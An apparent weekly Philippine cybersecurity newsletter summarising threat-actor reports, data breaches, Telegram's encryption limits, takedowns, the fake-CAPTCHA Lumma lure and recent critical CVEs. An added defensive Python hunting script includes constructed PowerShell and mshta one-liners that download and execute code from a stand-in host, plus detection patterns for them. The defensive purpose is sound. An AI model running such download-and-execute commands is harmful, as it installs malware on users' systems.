CyberSecurity.PH #031
China linked Earth Baxia threat; two new large PH data breaches; Telegram not encrypted; China linked Flax Typhoon threat; criminal comms platform Ghost takedown; Fake CAPTCHA verification spreads malware; Ransomware-Tool-Matrix; Unauthenticated RCE in all Linux; Zero-Click MediaTek vulnerability
Welcome to CyberSecurity.PH issue #031,
Hope to see you at RootCon this week; if you see us, stop and say hello!
You can help improve cybersecurity outcomes in the Philippines by telling your friends about us, or simply by subscribing their email address for them. We promise they will learn up-to-date, valuable cybersecurity insights each week.
CyberSecurity.PH is not just an awesome newsletter; we also have (free):
Learning materials - plenty of cybersecurity learning material, no matter what level you are at.
Engineering tools - and utilities to help you conduct your cybersecurity tasks; we like open-source tools.
Plenty of policy templates - to help you get started with your own.
Key cybersecurity strategy papers covering cybersecurity in PH.
Local education providers - an updated list of the known cybersecurity education providers across PH.
Philippines
China linked Earth Baxia threat group targeting APAC governments including Philippines
Cybersecurity company Trend Micro has released a report describing a threat-actor group they have named “Earth Baxia”. From their report: based on the collected phishing emails, decoy documents, and observations from incidents, it appears that the targets are primarily government agencies, telecommunication businesses, and the energy industry in the Philippines, South Korea, Vietnam, Taiwan, and Thailand. (Source: Trend Micro)
From the report - “we observed suspicious activity targeting a government organization in Taiwan, with other APAC countries also likely targeted, attributed to the threat actor Earth Baxia. In these campaigns, Earth Baxia used spear-phishing emails and exploited CVE-2024-36401, a vulnerability in an open-source server for sharing geospatial data called GeoServer” - Trend Micro: Ted Lee, Cyris Tseng, Pierre Lee, Sunny Lu, Philip Chen
If you run GeoServer, check your version: the fix for CVE-2024-36401 shipped in GeoServer 2.23.6, 2.24.4 and 2.25.2, and CISA added the CVE to its Known Exploited Vulnerabilities catalogue in July 2024, so an unpatched internet-facing instance should be treated as already compromised until proven otherwise.
Further reading - Trend Micro, The Hacker News, Dark Reading, Cybersecurity News
Deep Web Konek / Kukublan Philippines: 2x new large data breaches
Unconventional news source Kukublan Philippines continues its solid reporting on cybercrime activity in the Philippines; this week -
Massive data breach at the Villar Group of companies: 2.3 million sensitive data records exposed - kukublanph.data.blog
28 million PH passport holders' data at risk after cybersecurity failures, according to the Department of Foreign Affairs - kukublanph.data.blog
Philippines, we need to talk about Telegram
If you are using Telegram because it is a delightful communications tool for friends and the communities you interact with, then great. If you are using Telegram for anything to do with “security”, please stop what you are doing: you are at risk, and everything you have previously exchanged on Telegram is at risk. Telegram is not an end-to-end encrypted communications platform by default. Ordinary “cloud chats”, and every group and channel, are encrypted only between your device and Telegram’s servers, so Telegram, and anyone who can compel or compromise it, can read them. The optional “Secret Chats” feature is end-to-end encrypted, but it is one-to-one only, off by default and hard to find in the user interface, not supported by every client (Telegram Desktop does not offer it), and it does nothing for groups or for anything you have already sent.
Further reading - Cybersecurity.ph
Cybersecurity Threat Landscape
China linked Flax Typhoon threat group operating bot network with 260k infected devices
Integrity Technology Group (Integrity Tech), a Shanghai Stock Exchange-listed, PRC-backed company, has been publicly named by FBI Director Christopher Wray as responsible for running the botnet associated with the hacking group tracked as Flax Typhoon (the botnet itself is tracked as Raptor Train) - defense.gov report
The botnet comprised ~260k compromised Internet of Things (IoT) devices globally and was designed to steal sensitive information and disrupt critical services in the U.S. and other nations.
Compromised devices include products from well-known manufacturers including TP-Link, Zyxel, MikroTik, D-Link, Hikvision, Panasonic, QNAP and Synology. If you run any of these at the network edge, the usual advice applies: reboot the device (the implant did not persist across reboots on most of them), then patch it or replace it if it is end-of-life, and keep its management interface off the internet, otherwise it will simply be re-infected.
Further reading - The Register, Hack Read, Security Affairs, Bleeping Computer, Cyber.gov.au
Law enforcement takedowns and arrests over criminal communications platform 'Ghost'
A multi-country law-enforcement takedown of the “Ghost” encrypted chat-device platform, which was widely used by criminal networks, was conducted last week.
Reports state that thousands of people worldwide used Ghost to exchange thousands of messages per day. Subscriptions for the network cost $2,350 USD for six months and included a modified smartphone handset.
The mastermind behind the Ghost app was based in Sydney, Australia where the Australian Federal Police (AFP) have arrested him.
Further Reading - AFP.gov.au, Bleeping Computer, Hack Read, The Record
China threat actors suspected in Pacific islands diplomatic hack
The Australian government sent cyber threat responders to Fiji earlier this year to assist the Pacific Islands Forum (PIF) after their networks were compromised by Chinese state-backed hackers.
The cyber attack on the PIF secretariat, which is based in Suva, was detected in February 2024, although the threat actors likely gained access before this. The secretariat has confirmed “that there was indeed a cybersecurity incident here this year.”
This hack is not an isolated incident, earlier this year the small Pacific nation of Palau accused China of stealing more than 20,000 documents related to its relations with the US, Japan and Taiwan.
Further reading - The Record, ABC News, ASPI Strategist
Fake CAPTCHA verification spreading Lumma info stealer malware
Several well-known security researchers are calling out a weird bot-prevention (“CAPTCHA verification”) lure that has surfaced recently. Most readers here would recognise the attached image as fishy enough not to follow its instructions, but not everyone would know better. (Source: Krebs on Security)
If you’re not sure what’s going on here -
The “Windows + R” key press opens the Windows Run dialog, which executes whatever command is typed into it with the user’s own privileges.
The “Control + V” key press pastes into the Run dialog the command line the web page silently placed on the clipboard when the victim clicked the fake “I’m not a robot” button; the website has crafted a special (and malicious) one-liner, typically a PowerShell or mshta command that downloads and runs the next stage.
The “Enter” is the end game: the command runs, no download prompt, no SmartScreen warning, because the user “typed” it.
The outcome is that the victim gets a nasty surprise by installing the Lumma info-stealer, which vacuums up every location on the system where credentials, tokens, session-authentication cookies and secret keys are kept and sends them to the threat actors.
It’s not dumb if it works.
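How a defender might spot this after the fact, as an added example that is not from Krebs on Security or the original newsletter: the pasted command shows up in process-creation telemetry (Sysmon Event ID 1, EDR) as a child of explorer.exe, because that is what the Run dialog is, and Windows also records every Run-dialog command under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The Python below applies simple ClickFix heuristics to a few constructed Sysmon-style events and a constructed RunMRU value dump; the command lines, the example.invalid hostname and the encoded payload are all made up for the example, and the launcher list is an assumption to tune for your own estate.

```python
"""Hunt for ClickFix / fake-CAPTCHA launches in process-creation telemetry.

Added example (not the newsletter's or Krebs' code). The lure makes the
victim press Win+R, Ctrl+V, Enter, so the pasted command starts as a child of
explorer.exe (the Run dialog) and is usually a one-liner for mshta.exe /
powershell.exe / cmd.exe that fetches the next stage. Windows also keeps every
Run-dialog command under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU,
stored as "command\\1". All events and registry values below are constructed.
"""
import base64
import re

# Launchers typically named in the pasted one-liner (assumption: tune per estate)
LAUNCHERS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
             "curl.exe", "certutil.exe", "bitsadmin.exe", "wscript.exe"}

# Indicators of a remote fetch, in-memory execution or a hidden window
FETCH_PATTERNS = [r"https?://", r"\biex\b", r"invoke-expression", r"downloadstring",
                  r"invoke-webrequest", r"\biwr\b", r"\bmshta\b", r"frombase64string",
                  r"-w(indowstyle)?\s+hidden", r"\.hta\b"]

# PowerShell -e / -ec / -en / -enc / -EncodedCommand followed by a base64 blob
_ENC_RE = re.compile(r"[-/]e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def normalise(cmdline):
    """Lower-case, drop cmd.exe caret escapes (p^ow^ershell) and collapse whitespace."""
    return re.sub(r"\s+", " ", cmdline.replace("^", "")).strip().lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script (base64 of UTF-16LE), or '' if none."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Reasons an event looks like a Run-dialog ClickFix launch; [] when clean.

    explorer.exe -> launcher on its own is too noisy (people do run things from
    the Run dialog), so a hit also needs at least one fetch/execution indicator.
    """
    image, parent = _basename(event.get("Image", "")), _basename(event.get("ParentImage", ""))
    if parent != "explorer.exe" or image not in LAUNCHERS:
        return []
    raw = event.get("CommandLine", "")
    decoded = decode_encoded_command(raw)          # look inside -enc payloads too
    text = normalise(raw) + " " + decoded.lower()
    reasons = [f"matches {p!r}" for p in FETCH_PATTERNS if re.search(p, text)]
    if decoded:
        reasons.append("decoded -EncodedCommand: " + decoded.strip())
    if not reasons:
        return []
    return [f"{image} spawned by explorer.exe (Run dialog)"] + reasons


def scan(events):
    """Return [{'Image', 'CommandLine', 'reasons'}] for every flagged event."""
    out = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            out.append({"Image": _basename(ev["Image"]),
                        "CommandLine": ev["CommandLine"], "reasons": reasons})
    return out


def runmru_hits(values):
    """Suspicious commands from a RunMRU value dump ({name: data}); data ends in '\\1'."""
    hits = []
    for name, data in values.items():
        if name == "MRUList":            # ordering value, not a command
            continue
        cmd = data[:-2] if data.endswith("\\1") else data
        text = normalise(cmd) + " " + decode_encoded_command(cmd).lower()
        if any(re.search(p, text) for p in FETCH_PATTERNS):
            hits.append(cmd)
    return hits


# --- constructed sample telemetry (Sysmon Event ID 1 fields) ------------------
_ENC_PAYLOAD = base64.b64encode("iex (iwr 'https://example.invalid/a')".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell -w hidden -enc {_ENC_PAYLOAD}"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c dir"},                         # benign Run-dialog use
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",    # scheduled task, not the Run dialog
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
]
SAMPLE_RUNMRU = {"MRUList": "ba", "a": "notepad\\1",
                 "b": "powershell -w hidden -c \"iex (iwr https://example.invalid/x)\"\\1"}

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["Image"], "->", "; ".join(hit["reasons"]))
    print("RunMRU:", runmru_hits(SAMPLE_RUNMRU))
```

The parent/child check is what separates this from ordinary PowerShell noise: a scheduled task or a logon script is spawned by svchost.exe or a script host, not by explorer.exe. Decoding -EncodedCommand matters because the clipboard payloads are usually obfuscated exactly that way, and the RunMRU check gives you the same evidence from a disk image when no EDR was running.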
Cybersecurity Engineering
A weekly highlight on tools and other resources (often open-source) that we use, find useful, or that are just plain interesting; check out our engineering section online at CyberSecurity.PH too!
s0md3v/Photon - an incredibly fast crawler designed for open-source intelligence gathering - github.com/s0md3v/Photon
BushidoUK/Ransomware-Tool-Matrix - an excellent Blue Team resource cataloging the tools used by ransomware gangs - github.com/BushidoUK/Ransomware-Tool-Matrix
saw-your-packet/CloudShovel - A tool for scanning public or private AMIs for sensitive files and secrets - github.com/saw-your-packet/CloudShovel
Cybersecurity Vulnerabilities
Rumors of an unauthenticated remote-code-execution vulnerability in all Linux systems (CVSS 9.9)
There are rumors swirling of a high-impact remote-code-execution vulnerability that supposedly affects all Linux systems, due to be publicly disclosed on October 6. The details are not at all clear, and no CVE has been assigned yet, as would be customary for a matter like this.
The individual making the claim (evilsocket, aka Simone Margaritelli) is known and well respected among cybersecurity developers so it’s not easy to dismiss the claim.
If true this will be a big deal and worth paying attention to.
Further reading - Cybersecurity News, Thread Reader
Zero-Click MediaTek vulnerability opens handheld devices and Wi-Fi to takeover attacks (CVSS 9.8)
MediaTek might not be a name you know offhand, but their chipsets and associated drivers provide the Wi-Fi functionality in many devices and appliances you very likely use, including routers and access points, not just handsets.
The vulnerability, tracked as CVE-2024-20017, is an out-of-bounds write in the wappd service, which is responsible for configuring and managing wireless interfaces; it is reachable over the network with no user interaction, hence “zero-click”. Affected code ships inside vendor firmware built on MediaTek’s SDK, so check for firmware updates from the device maker rather than from MediaTek.
Most concerningly, a proof-of-concept exploit is already doing the rounds, which makes weaponisation quite likely.
Further reading - SonicWall, Dark Reading, The Hacker News
GitLab patches vulnerability for critical SAML authentication bypass (CVSS 10.0)
GitLab has released updates to address an authentication bypass vulnerability that affects self-managed installations using SAML single sign-on.
The vulnerability is tracked as CVE-2024-45409 and lies in the Ruby-SAML library (used through OmniAuth-SAML) that GitLab relies on for SAML authentication: an unauthenticated attacker who holds any SAML document signed by the identity provider can forge a SAML response with arbitrary contents and log in as any user. Ruby-SAML 1.17.0 (and 1.12.3 for the older branch) contain the fix. If you cannot upgrade immediately, GitLab’s advice is to enforce two-factor authentication for all accounts and not to enable the SAML two-factor bypass option.
Further reading - Bleeping Computer, Dark Reading
Yet another critical vulnerability in VMware vCenter that enables remote code execution (CVSS 9.8)
Broadcom has released updates to address CVE-2024-38812 (CVSS score: 9.8), a heap overflow in the DCERPC protocol implementation of VMware vCenter Server that can lead to remote code execution.
“A malicious actor with network access to vCenter Server may trigger this vulnerability by sending a specially crafted network packet potentially leading to remote code execution.” reads the advisory.
Further reading - Security Affairs, Bleeping Computer
Yet another SolarWinds critical vulnerability in Access Rights Manager utility (CVSS 9.0)
This issue, tracked as CVE-2024-28991, is a deserialization of untrusted data that allows an authenticated remote threat actor to execute arbitrary code on vulnerable systems; it is fixed in ARM 2024.3.1.
Further reading - Security Affairs, Security Week
Got news or something you’d like us to mention? Feel free to get in contact - [email protected]